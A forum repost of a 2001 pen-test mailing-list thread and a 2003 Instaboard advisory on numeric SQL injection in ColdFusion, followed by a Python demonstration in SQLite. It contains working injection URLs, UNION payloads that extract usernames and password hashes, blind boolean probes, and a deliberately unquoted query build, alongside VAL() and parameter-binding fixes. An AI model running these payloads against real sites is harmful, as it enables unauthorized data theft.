CFM SQL injection

Heh, this is basically the same as with ASP; it just depends on what platform is behind the site.

There are two documents, both presented in the form of someone asking a question. I find that abroad, whether it is teaching or articles about computing, things are a lot more humorous than the teaching we get at home, which makes learning much more relaxed. Sigh, when will things change here? Probably never, sigh!
Quote
It looks like the query that you're attacking isn't prepending and
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID

This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1

Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.

Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.

----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection

> Hello guys,
>
> I'm performing a pen-test against a website with ColdFusion installed. I obtain
> some error information, but I'm not able to do anything because the server
> never understands the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are the following:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8'
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier of
> (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:/blabla/page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands. It
> seems that it is not an SQL issue; instead it looks like a ColdFusion error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier of
> (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, I get an error from the SQL database. But I still don't know how to
> take advantage of it. I don't know the database name and I have very little
> info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request: http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier of
> (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier of
> (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
>
Quote
Affected Product: NetPleasure's Instaboard 1.3
www.netpleasure.com/instaboard/

Vulnerability: Multiple SQL Injection Vulnerabilities.

http://server/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
http://server/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
http://server/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
http://server/instaboard/index.cfm?catid=1%20SQL

Notification:
Messages were posted on the Instaboard demo forum, in the "Instaboard 1.3
Troubleshooting and Problems" area, on April 02 2003. As of yet, there has
been no reply publicly or privately from the author. Author emailed at
instaboard at netpleasure.com on Tue, 8 Apr 2003 16:06:19 -0400

Proposed Solution:
If you have the licensed version of the product, protect the numerical
values within the CFQUERY tags:

for example:
In queries/oraclen/qry_GetOriginalMessage.cfm
change
WHERE m.tpcid = #tpcid#
AND m.userid = u.userid
AND m.msgid = #msgid#

to

WHERE m.tpcid = #VAL(tpcid)#
AND m.userid = u.userid
AND m.msgid = #VAL(msgid)#

--
"Most moms teach their daughters how to run a house, but you? You teach
yours the fine art of mass destruction."
- Nabs - Goodbye is not forever

perl -le '$_="6110>374086;2064208213:90<307;55";tr[0->][ LEOR!AUBGNSTY];print'
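Both quoted posts turn on the same point: a numeric parameter dropped into the WHERE clause with no surrounding quotes, so no quote is needed to break out. The following Python script is an added example, not code from either post or from Instaboard, and models that against an in-memory SQLite database: the unquoted string build Spett describes, the UNION column-count error he hopes to provoke, the boolean `AND` probes of the Instaboard `frmid=1 AND u.userid IN (...)` kind, and then the advisory's `VAL()` fix next to a stricter validate-and-bind version. The table and column names (`pages`, `users`, `PageID`, `FieldOne..FieldThree`, `username`, `pwhash`) and all rows are constructed for the example; `cf_val` is an approximation of ColdFusion's `VAL()`, not its implementation. SQLite's error text differs from the ODBC/SQL Server messages in the posts, and the example does not model the CFPARAM type check that fired on some of Charlie's inputs, only the query build.

```python
# Added example, not code from the quoted posts. Models the numeric-context
# injection from both posts against an in-memory SQLite database. Table/column
# names (pages, users, PageID, FieldOne..FieldThree, userid, username, pwhash)
# and all rows are constructed for this example.
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Throwaway database with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pages (PageID INTEGER PRIMARY KEY,
                            FieldOne TEXT, FieldTwo TEXT, FieldThree TEXT);
        INSERT INTO pages VALUES (8, 'Home', 'Welcome', 'public');
        INSERT INTO pages VALUES (9, 'About', 'Company info', 'public');
        CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, pwhash TEXT);
        INSERT INTO users VALUES (1, 'admin',   '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES (2, 'charlie', 'e99a18c428cb38d5f260853678922e03');
    """)
    return con


def probe(page_id: str):
    """The string build Spett describes: the raw parameter is concatenated into
    the WHERE clause with no surrounding quotes. Returns ("rows", rows) or
    ("error", message), i.e. what the attacker sees on a page that echoes
    database errors."""
    sql = ("SELECT FieldOne, FieldTwo, FieldThree FROM pages WHERE PageID = "
           + page_id)                     # vulnerable: no validation, no quoting
    try:
        return ("rows", make_db().execute(sql).fetchall())
    except sqlite3.Error as e:
        return ("error", str(e))


def cf_val(s: str) -> float:
    """Approximation of ColdFusion's VAL() (an assumption for this example):
    the leading numeric prefix of the string, or 0 if there is none."""
    m = re.match(r"\s*[-+]?\d+(\.\d+)?", s)
    return float(m.group(0)) if m else 0.0


def page_by_val(page_id: str):
    """The advisory's fix, WHERE PageID = #VAL(page_id)#: the payload is cut
    down to its numeric prefix before it reaches SQL."""
    sql = ("SELECT FieldOne, FieldTwo, FieldThree FROM pages WHERE PageID = %d"
           % int(cf_val(page_id)))
    return make_db().execute(sql).fetchall()


def is_integer_id(s: str) -> bool:
    """Strict allow-list: only an unsigned decimal integer counts as an id."""
    return re.fullmatch(r"\d+", s.strip()) is not None


def page_by_param(page_id: str):
    """Stricter alternative: reject anything that is not an integer, then bind
    it as a query parameter instead of concatenating it."""
    if not is_integer_id(page_id):
        raise ValueError("page_id must be an unsigned integer")
    return make_db().execute(
        "SELECT FieldOne, FieldTwo, FieldThree FROM pages WHERE PageID = ?",
        (int(page_id),),
    ).fetchall()


if __name__ == "__main__":
    for p in ["8", "8'",
              "9999 UNION SELECT username FROM users WHERE 1=1",   # column-count error
              "9999 UNION SELECT username, pwhash, 'x' FROM users",  # matched columns
              "8 AND 1=1", "8 AND 1=2",                            # boolean probes
              "8 AND (SELECT COUNT(*) FROM users) = 2"]:
        print(repr(p), "->", probe(p))
    print("VAL fix:", page_by_val("9999 UNION SELECT username, pwhash, 'x' FROM users"))
    print("VAL fix on 3,4:", cf_val("3,4"))
```

Running it shows why Spett wants an error rather than a blank page: the one-column `UNION` fails with a column-count message, which tells the attacker how many columns to supply, after which the three-column version returns the `users` rows in place of the page. The `AND 1=1` / `AND 1=2` pair is the blind variant, the same shape as the Instaboard `frmid=1 AND u.userid IN (...)` URL. The `VAL()` fix works by truncation: `3,4` becomes 3 and `8 AND 1=2` becomes 8, so the page still renders but the injected clause never reaches SQL; the validate-and-bind version rejects the request instead, which is the behaviour to prefer when you can change the code rather than patch a template.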